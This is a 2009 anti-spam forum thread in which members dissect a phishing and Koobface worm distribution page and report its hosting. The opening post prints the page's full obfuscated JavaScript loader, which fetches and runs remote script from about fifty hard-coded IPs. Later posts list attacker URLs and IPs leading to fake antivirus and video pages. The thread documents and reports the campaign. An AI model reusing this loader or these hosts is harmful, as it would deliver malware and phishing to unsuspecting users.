Social sites phish/worm hosting on AS39023

Phishing operations, including perpetrators, how to report them and get them shut down.

Social sites phish/worm hosting on AS39023

Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 3:15 pm

Source of "http://fraghouse.ichclan.at/572/?go" below, contains the following spammed links to fake login pages for:
http://fraghouse.ichclan.at/572/facebook.com
http://fraghouse.ichclan.at/572/tagged.com
http://fraghouse.ichclan.at/572/friendster.com
http://fraghouse.ichclan.at/572/myspace.com
http://fraghouse.ichclan.at/572/msplinks.com
http://fraghouse.ichclan.at/572/lnk.ms
http://fraghouse.ichclan.at/572/myyearbook.com
http://fraghouse.ichclan.at/572/fubar.com
http://fraghouse.ichclan.at/572/twitter.com
http://fraghouse.ichclan.at/572/hi5.com
http://fraghouse.ichclan.at/572/bebo.com
http://fraghouse.ichclan.at/572/.132.128.31
http://fraghouse.ichclan.at/572/.235.164.159
http://fraghouse.ichclan.at/572/137.4
http://fraghouse.ichclan.at/572/9.253.146
http://fraghouse.ichclan.at/572/.33.126.237
http://fraghouse.ichclan.at/572/97.81.
http://fraghouse.ichclan.at/572/104.176
http://fraghouse.ichclan.at/572/24.1
http://fraghouse.ichclan.at/572/45.33.205
http://fraghouse.ichclan.at/572/08.126.22.90
http://fraghouse.ichclan.at/572/79.178
http://fraghouse.ichclan.at/572/.48.193
http://fraghouse.ichclan.at/572/93.17
http://fraghouse.ichclan.at/572/5.40.214
http://fraghouse.ichclan.at/572/.250.166.77
http://fraghouse.ichclan.at/572/.78.128.27
http://fraghouse.ichclan.at/572/69.2
http://fraghouse.ichclan.at/572/05.213.172
http://fraghouse.ichclan.at/572/.128.14.14

Source:
Code: Select all
<script>
// KROTEG
var pdousaqbmlxzcywfj8 = [
['facebook.com',  'fb2'],
['tagged.com',    'tg'],
['friendster.com','fr'],
['myspace.com',   'ms'],
['msplinks.com',  'ms'],
['lnk.ms',  'ms'],
['myyearbook.com','yb'],
['fubar.com',     'fu'],
['twitter.com',   'tw'],
['hi5.com',       'hi5'],
['bebo.com',      'be']
];
var xipjfslbtvmzgkao6 = [
'217' + '.132.128.31',
'98' + '.235.164.159',
'137.4' + '9.253.146',
'75' + '.33.126.237',
'97.81.' + '104.176',
'24.1' + '45.33.205',
'2' + '08.126.22.90',
'79.178' + '.48.193',
'93.17' + '5.40.214',
'85' + '.250.166.77',
'89' + '.78.128.27',
'69.2' + '05.213.172',
'203' + '.128.14.14',
'218' + '.168.124.246',
'94' + '.168.88.175',
'84.2' + '23.71.54',
'86' + '.2.249.242',
'61.93' + '.177.17',
'88.18' + '5.77.165',
'79.180' + '.136.188',
'88' + '.203.78.208',
'98.24' + '2.180.185',
'75.250.' + '179.122',
'115.' + '240.63.182',
'8' + '9.138.109.48',
'83.' + '93.9.216',
'95' + '.35.35.13',
'75' + '.132.234.213',
'209' + '.237.70.23',
'1' + '24.82.104.216',
'99.66' + '.69.109',
'75.4' + '.10.58',
'92.' + '143.67.161',
'74.' + '210.38.68',
'2' + '21.126.3.32',
'84' + '.109.75.232',
'92.236' + '.168.31',
'1' + '10.36.14.97',
'7' + '8.132.195.59',
'75.65' + '.253.230',
'24' + '.151.241.242',
'96.' + '237.121.115',
'6' + '8.206.98.117',
'79.181' + '.118.186',
'83.21' + '2.71.30',
'134' + '.99.134.85',
'79.' + '173.218.166',
'79.178' + '.136.68',
'69' + '.223.176.37',
'8' + '3.252.196.230'];
var zqnfwerkvbc3 = '', lmuahzfrjocktyg8 = '', iujoaqrdphg1 = '', ibudrxcywlmsovphngke9 = '';
var jazwkchdgspfvrnmoytb0 = '' + eval('doc'+zqnfwerkvbc3+'ume'+lmuahzfrjocktyg8+'nt.r'+iujoaqrdphg1+'efer'+ibudrxcywlmsovphngke9+'rer'), cnbyos2 = '';
for (var jnkethcbzgmrdlwqx3 = 0; jnkethcbzgmrdlwqx3 < pdousaqbmlxzcywfj8.length; jnkethcbzgmrdlwqx3 ++) {
    if ((jazwkchdgspfvrnmoytb0.indexOf(pdousaqbmlxzcywfj8[jnkethcbzgmrdlwqx3][0]) != -1)) {
      cnbyos2 = '/f=' + pdousaqbmlxzcywfj8[jnkethcbzgmrdlwqx3][1];
      break;
    }
}
if ((jazwkchdgspfvrnmoytb0.indexOf('google.com/reader/shared') != -1) && (jazwkchdgspfvrnmoytb0.indexOf('?id=') != -1)) cnbyos2 = '/f=ms';
if (location.href.indexOf('?go&ms') != -1) cnbyos2 = '/f=ms';
window.redirect = '';
function cnvoekxspzaqyhlt1() {
   var praenouhzdqm2 = '' + eval('win'+'dow.r'+'edir'+'ect;');
   if (praenouhzdqm2.length > 0) eval('wi'+'ndow'+'.lo'+'cati'+'on.hr'+'ef = praenouhzdqm2;');
   else setTimeout('cnvoekxspzaqyhlt1()', 50);
}
cnvoekxspzaqyhlt1();
var js = '/vi'+'ew', l = '' + eval('loc'+'at'+'ion.'+'hr'+'ef');
var n = l.indexOf('?i'+'d=');
if (n != -1) {
   n = parseInt(l.substr(n + 4));
   if (n < 101) js = '/c'+'ne'+'t';
   else if (n < 201) js = '/vi'+'ew';
   else if (n < 301) js = '/sc'+'an';
   else if (n < 401) js = '/wa'+'rn';
   else if (n < 501) js = '/y'+'out'+'ube';
}
var ss = '' + eval('l'+'oca'+'ti'+'on.s'+'ear'+'ch');
ss = (ss.length > 0 ? ss : '');
for (var jnkethcbzgmrdlwqx3 = 0; jnkethcbzgmrdlwqx3 < xipjfslbtvmzgkao6.length; jnkethcbzgmrdlwqx3 ++) {
   var nn = 'sc'+'rip'+'t', ugmktsronfzbljy7 = document.createElement(nn);
   ugmktsronfzbljy7.type = 'te'+'xt'+'/ja'+'va'+nn;
   ugmktsronfzbljy7.src = 'ht'+'tp:'+'//' + xipjfslbtvmzgkao6[jnkethcbzgmrdlwqx3] + '/go' + '.js' + '?0x'+'3E'+'8' + cnbyos2 + js + '/co'+'nsol'+'e=y'+'es/' + ss;
   document.getElementsByTagName('h'+'ea'+'d')[0].appendChild(ugmktsronfzbljy7);
}

</script>

Reported to parents of routing agent "tuxtools.com" which is a /23 operated by IpexMedia.com - who is also responsible for PharmacyExpress bogus ".at" domains.
Only on our site you will find a SPICE under the comprehensible prices!
MyCanadian Spammerdeath
Spammer Exterminator
 
Posts: 1145
Joined: Mon Feb 26, 2007 11:13 pm

Re: Social sites phish/worm hosting on AS39023

Postby meep » Thu Nov 12, 2009 3:52 pm

Interesting multi-brand phish and already 404ed. Good for IpexMedia.com (not familiar with that hoster).

Checked a few:

Code: Select all
--- 11/12/09 14:51:37 Eastern Standard Time
--- reading URL http://fraghouse.ichclan.at/572/lnk.ms
--- contacting host fraghouse.ichclan.at [195.42.120.133] on port 80

HTTP/1.1 404 Not Found
Date: Thu, 12 Nov 2009 19:51:35 GMT
Server: Apache/1.3.37 (Unix)  (Gentoo) mod_ssl/2.8.28 OpenSSL/0.9.8g TuxTrafficLogRotate/20051209-00 TuxSQLConf/20070207-00 mod_perl/1.29 PHP/4.4.7-tuxtools FrontPage/5.0.2.2635
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

119
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /572/lnk.ms was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.37 Server at fraghouse.ichclan.at Port 80</ADDRESS>
</BODY></HTML>

0


--- connection closed
User avatar
meep
Spammers' Nightmare
 
Posts: 2777
Joined: Thu Apr 05, 2007 4:10 pm

Re: Social sites phish/worm hosting on AS39023

Postby spamislame » Thu Nov 12, 2009 4:06 pm

In plain English:

That page is checking to see which domain referred you there. Based on the referring domain, it attempts to redirect you to one of 50 distinct ips running a further JavaScript

Example:

Code: Select all
http://71.251.56.113/go.js?0x3E8/f=/cnet/console=yes/


Which in turn said it wanted to redirect to:

Code: Select all
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/cnet/console=yes/


Which attempts to resemble a "Download.com" page, which of course is shucking fake antivirus.

Other options include:

Code: Select all
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/view/console=yes/
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/scan/console=yes/
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/warn/console=yes/
http://71.251.56.113/d=fraghouse.ichclan.at/0x3E8/f=/youtube/console=yes/


Each of these replicate fake versions of Youtube and other video or fake "scan" sites.

Total list of IP's in ascending order:

Code: Select all
24.214.69.74
41.249.43.41
61.238.54.87
65.24.95.126
65.30.16.121
67.149.142.169
67.149.244.132
69.247.230.251
69.94.216.132
70.238.172.197
71.205.189.174
71.251.56.113
71.92.208.150
72.129.238.62
75.136.110.214
75.201.65.133
75.84.9.161
76.77.131.148
78.97.194.11
79.178.206.85
79.178.255.218
79.183.206.160
82.130.160.2
83.24.15.30
83.254.58.105
85.65.92.44
88.23.209.95
89.138.102.132
91.58.246.83
95.139.171.207
95.76.131.219
95.86.70.239
97.103.226.87
98.141.162.79
98.240.244.36
98.251.64.174
99.190.80.217
99.234.96.18
99.63.143.54
111.119.174.129
131.111.224.99
188.24.247.198
195.0.200.145
196.206.225.194
200.119.229.149
207.144.103.37
207.98.243.4
212.35.94.195
213.112.199.191
213.47.12.62


Note that if you view 71.251.56.113 on its own you get a fake Facebook output.

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Social sites phish/worm hosting on AS39023

Postby spamislame » Thu Nov 12, 2009 4:07 pm

Add: the "setup.exe" files each of these is trying to get the user to execute is, of course, Koobface.

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Social sites phish/worm hosting on AS39023

Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 4:27 pm

meep wrote:Interesting multi-brand phish and already 404ed. Good for IpexMedia.com (not familiar with that hoster).

Checked a few:

Code: Select all
--- 11/12/09 14:51:37 Eastern Standard Time
--- reading URL http://fraghouse.ichclan.at/572/lnk.ms
--- contacting host fraghouse.ichclan.at [195.42.120.133] on port 80

HTTP/1.1 404 Not Found
Date: Thu, 12 Nov 2009 19:51:35 GMT
Server: Apache/1.3.37 (Unix)  (Gentoo) mod_ssl/2.8.28 OpenSSL/0.9.8g TuxTrafficLogRotate/20051209-00 TuxSQLConf/20070207-00 mod_perl/1.29 PHP/4.4.7-tuxtools FrontPage/5.0.2.2635
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

119
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /572/lnk.ms was not found on this server.<P>
<HR>
<ADDRESS>Apache/1.3.37 Server at fraghouse.ichclan.at Port 80</ADDRESS>
</BODY></HTML>

0


--- connection closed

Interesting that tuxtools - essentially a phish-page deployment tool, near as I can tell (though pure supposition) has branded its own httpd.

But: I get no 404 at the spammed URL -- http://fraghouse.ichclan.at/572/?go still loads all the links I listed up top.
Only on our site you will find a SPICE under the comprehensible prices!
MyCanadian Spammerdeath
Spammer Exterminator
 
Posts: 1145
Joined: Mon Feb 26, 2007 11:13 pm

Re: Social sites phish/worm hosting on AS39023

Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 4:39 pm

According to PC Magazine koobface has also just been modified to permeate image-links on Google Reader, for those who have Reader accounts.

Article just published in PCWorld discusses other facets of new koobface upgrade.
Only on our site you will find a SPICE under the comprehensible prices!
MyCanadian Spammerdeath
Spammer Exterminator
 
Posts: 1145
Joined: Mon Feb 26, 2007 11:13 pm

Re: Social sites phish/worm hosting on AS39023

Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 4:56 pm

And now I'm seeing it on Blogspot and on Spaces (which Microsoft has just taken down, it appears), and I'm seeing it spoofing PayPal - I removed the url...

Just copying that PayPal phish url to my clipboard triggered an Avira alert.
Last edited by MyCanadian Spammerdeath on Thu Nov 12, 2009 6:24 pm, edited 1 time in total.
Only on our site you will find a SPICE under the comprehensible prices!
MyCanadian Spammerdeath
Spammer Exterminator
 
Posts: 1145
Joined: Mon Feb 26, 2007 11:13 pm

Re: Social sites phish/worm hosting on AS39023

Postby spamislame » Thu Nov 12, 2009 5:16 pm

Mr. Danchev is actively documenting all of this btw:

http://ddanchev.blogspot.com/2009/11/ko ... iness.html

Definitely a good (and entertaining) read.

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Social sites phish/worm hosting on AS39023

Postby AlphaCentauri » Thu Nov 12, 2009 6:23 pm

MyCanadian Spammerdeath wrote:Hey, this is cool: Just copying that PayPal phish url to my clipboard triggered an Avira alert.


My Avira is getting apoplectic over this whole thread. Can we insert some invisible tags somewhere?
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Social sites phish/worm hosting on AS39023

Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 6:23 pm

Heh: Pancho Panchev. Tribute.
Only on our site you will find a SPICE under the comprehensible prices!
MyCanadian Spammerdeath
Spammer Exterminator
 
Posts: 1145
Joined: Mon Feb 26, 2007 11:13 pm

Re: Social sites phish/worm hosting on AS39023

Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 6:25 pm

AlphaCentauri wrote:
MyCanadian Spammerdeath wrote:Hey, this is cool: Just copying that PayPal phish url to my clipboard triggered an Avira alert.


My Avira is getting apoplectic over this whole thread. Can we insert some invisible tags somewhere?

I just removed the PayPal phish url.
Only on our site you will find a SPICE under the comprehensible prices!
MyCanadian Spammerdeath
Spammer Exterminator
 
Posts: 1145
Joined: Mon Feb 26, 2007 11:13 pm

Re: Social sites phish/worm hosting on AS39023

Postby spamislame » Thu Nov 12, 2009 9:37 pm

Let me just say that that's a good sign (the Avira alerts.)

What's the market penetration of that tool?

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Social sites phish/worm hosting on AS39023

Postby MyCanadian Spammerdeath » Thu Nov 12, 2009 10:36 pm

spamislame wrote:What's the market penetration of that tool?

Their website claims over 100 million users worldwide. PC World and AV-Comparatives both rate it the best of the free AV programs, though other sources give that honor to AVG - I've used both, as well as Norton and others. So far I like Avira best - though AVG has more configuration options. But it (AVG) claims - in one of its forms - to be free, yet it stops working with an almost impossible uninstall, after a time.
Only on our site you will find a SPICE under the comprehensible prices!
MyCanadian Spammerdeath
Spammer Exterminator
 
Posts: 1145
Joined: Mon Feb 26, 2007 11:13 pm

Re: Social sites phish/worm hosting on AS39023

Postby AlphaCentauri » Fri Nov 13, 2009 12:24 am

The full version of Avira is cheap ($25/year) and that includes the antispyware etc. If you set Noscript to always allow trusted sites, it's nice to have a backup warning in case one gets hacked and has malicious javascript inserted.
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Social sites phish/worm hosting on AS39023

Postby Volksjaeger » Fri Nov 13, 2009 12:27 am

MyCanadian Spammerdeath wrote:
spamislame wrote:What's the market penetration of that tool?

Their website claims over 100 million users worldwide. PC World and AV-Comparatives both rate it the best of the free AV programs, though other sources give that honor to AVG - I've used both, as well as Norton and others. So far I like Avira best - though AVG has more configuration options. But it (AVG) claims - in one of its forms - to be free, yet it stops working with an almost impossible uninstall, after a time.


That's for sure, with regards to the impossible uninstall part the same is true for Avast although I finally fixed that problem. I still have registry keys that pop up even though I uninstalled the program years ago, or I did until I finally went through and manually deleted all of them by hand.
Verloren ist nur, wer sich selbst aufgibt!
User avatar
Volksjaeger
Spam Muncher
 
Posts: 787
Joined: Thu Dec 25, 2008 8:39 pm


Return to Phishers

Who is online

Users browsing this forum: No registered users and 1 guest

cron